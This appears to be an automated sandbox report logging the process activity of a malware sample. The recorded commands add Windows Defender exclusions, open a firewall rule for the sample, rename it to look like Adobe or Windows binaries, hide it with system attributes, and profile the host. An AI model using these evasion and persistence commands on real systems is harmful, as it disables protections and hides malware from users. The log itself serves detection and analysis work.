Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
